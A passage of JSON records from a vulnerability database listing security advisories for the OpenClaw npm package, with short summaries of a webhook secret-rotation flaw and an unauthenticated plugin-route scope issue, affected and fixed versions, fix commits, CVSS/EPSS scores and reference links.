version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `a30214a624946fc5c85c9558a27c1580172374fd` — 2026-03-31T09:06:51+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41329", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15986", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.1603", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.1604", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41329" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/a30214a624946fc5c85c9558a27c1580172374fd", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "9.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T19:38:10Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/a30214a624946fc5c85c9558a27c1580172374fd" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g5cg-8x5w-7jpm", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "9.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T19:38:10Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g5cg-8x5w-7jpm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41329", "reference_id": "CVE-2026-41329", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41329" }, { "reference_url": "https://github.com/advisories/GHSA-g5cg-8x5w-7jpm", "reference_id": "GHSA-g5cg-8x5w-7jpm", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-g5cg-8x5w-7jpm" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-sandbox-bypass-via-heartbeat-context-inheritance-and-senderisowner-escalation", "reference_id": "openclaw-sandbox-bypass-via-heartbeat-context-inheritance-and-senderisowner-escalation", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T19:38:10Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-sandbox-bypass-via-heartbeat-context-inheritance-and-senderisowner-escalation" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41329", "GHSA-g5cg-8x5w-7jpm" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3zx4-t8cj-kbfn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95449?format=api", "vulnerability_id": "VCID-4316-7q9a-xuhx", "summary": "OpenClaw's Webhooks SecretRef route secret remains valid after rotation/reload\n## Summary\n\nOpenClaw webhooks allowed route secrets to be backed by `SecretRef` values, but cached the resolved secret for a route. After an operator rotated the underlying secret and ran `openclaw secrets reload`, the previous resolved webhook secret could remain valid until the plugin or gateway restarted.\n\n## Impact\n\nAn attacker who already had a previously valid webhook route secret could continue authenticating webhook requests after the operator rotated the secret and reloaded secrets. This weakened credential rotation for webhook routes and could allow continued invocation of the configured webhook task flow until restart.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected: versions before `2026.4.23`\n- Fixed: `2026.4.23`\n- Latest stable verified fixed: `openclaw@2026.4.23`, tag `v2026.4.23`\n\n## Fix\n\nWebhook route authentication now resolves `SecretRef`-backed route secrets on each request. A rotated secret becomes effective after `openclaw secrets reload` without requiring a gateway or plugin restart, and the old secret is rejected.\n\n## Fix Commit(s)\n\n- `36c4a372a0ad5dca8bfc0d93f7aab9c2f2de66fa` (`fix(webhooks): reload route secrets per request`)\n\n## Severity\n\nSeverity remains `medium`. The attack requires possession of a previously valid route secret, but the stale credential can continue to authorize webhook actions after rotation.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45005", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17844", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17878", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17882", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45005" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/36c4a372a0ad5dca8bfc0d93f7aab9c2f2de66fa", "reference_id": "", "reference_type": "", "scores": [ { "value": "6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L" }, { "value": "6.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T16:10:40Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/36c4a372a0ad5dca8bfc0d93f7aab9c2f2de66fa" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q8ff-7ffm-m3r9", "reference_id": "", "reference_type": "", "scores": [ { "value": "6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L" }, { "value": "6.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T16:10:40Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q8ff-7ffm-m3r9" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45005", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45005" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-webhook-route-secret-cache-not-invalidated-after-rotation", "reference_id": "", "reference_type": "", "scores": [ { "value": "6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L" }, { "value": "6.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T16:10:40Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-webhook-route-secret-cache-not-invalidated-after-rotation" }, { "reference_url": "https://github.com/advisories/GHSA-q8ff-7ffm-m3r9", "reference_id": "GHSA-q8ff-7ffm-m3r9", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q8ff-7ffm-m3r9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/114733?format=api", "purl": "pkg:npm/openclaw@2026.4.23", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.23" } ], "aliases": [ "CVE-2026-45005", "GHSA-q8ff-7ffm-m3r9" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4316-7q9a-xuhx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89638?format=api", "vulnerability_id": "VCID-4hz5-f2pw-3yb4", "summary": "OpenClaw: Unauthenticated plugin-auth HTTP routes receive operator runtime scopes\n## Summary\nUnauthenticated plugin-auth HTTP routes receive operator runtime scopes\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: v2026.3.28 still gives auth:\"plugin\" routes operator WRITE_SCOPE, but impact should stay limited to plugin routes that actually touch privileged runtime actions before plugin auth completes.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `2a1db0c0f1fa375004a95ba0ef030534790a6d47` — 2026-04-01T00:20:49+09:00\n\nOpenClaw thanks @davidluzsilva for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41394", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00098", "scoring_system": "epss", "scoring_elements": "0.26999", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00098", "scoring_system": "epss", "scoring_elements": "0.27037", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00098", "scoring_system": "epss", "scoring_elements": "0.27045", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41394" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/2a1db0c0f1fa375004a95ba0ef030534790a6d47", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:51:37Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/2a1db0c0f1fa375004a95ba0ef030534790a6d47" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mhgq-xpfq-6r66", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:51:37Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mhgq-xpfq-6r66" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41394", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41394" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-unauthorized-operator-scope-access-in-unauthenticated-plugin-auth-routes", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:51:37Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-unauthorized-operator-scope-access-in-unauthenticated-plugin-auth-routes" }, { "reference_url": "https://github.com/advisories/GHSA-mhgq-xpfq-6r66", "reference_id": "GHSA-mhgq-xpfq-6r66", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mhgq-xpfq-6r66" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], 